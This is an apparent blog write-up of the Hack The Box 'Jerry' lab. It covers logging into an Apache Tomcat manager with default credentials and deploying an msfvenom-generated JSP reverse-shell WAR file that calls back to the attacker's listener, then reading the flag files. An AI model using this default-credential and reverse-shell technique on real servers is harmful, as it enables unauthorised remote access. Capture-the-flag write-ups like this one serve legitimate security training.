Hack The Box Jerry Write-Up

Enumeration

Nmap

Nmap reveals that port number 8080 is open, let’s visit the port number 8080 in web browser.

Apache Tomcat/7.0.88
Basic access authentication

To access Tomcat manger we need a valid Username and Password, When we enter any invalid Username and Password we will get a 403 Access Denied message.

403 Acess Denied

Let’s try the Username : tomacat and password : s3cret

Once we successfully authenticate were brought to the Tomcat Web Application . The Tomcat manager has an option to upload .war files to the server.

Tomcat Web Application Manager

Exploitation

We can use msfvenom to generate a java payload for reverse shell with .war extension

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.6 LPORT=4444 -f war > cmd.war

Upload and Deploy the reverse shell then visit http://10.10.10.95:8080/cmd/

Let’s open a netcat Listener to get the shell which will be generated after our cmd.war file gets executed.

The Flag is located in

C:\Users\Administrator\Desktop\flags

The user and root flags are written in 2 for the price of 1.txt file and it can be read using type command.

type "2 for the price of 1.txt"

--

--

--

Self-learner |Bug Hunter|

Love podcasts or audiobooks? Learn on the go with our new app.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Akash c

Akash c

Self-learner |Bug Hunter|

More from Medium

TryHackMe’s “RootMe” —  A Writeup

Kenobi Walkthrough | TryHackMe | Explained | Part 1

XSS Attack! TryHackMe Writeup/Walkthrough

TryHackMe : Bounty Hacker Walkthrough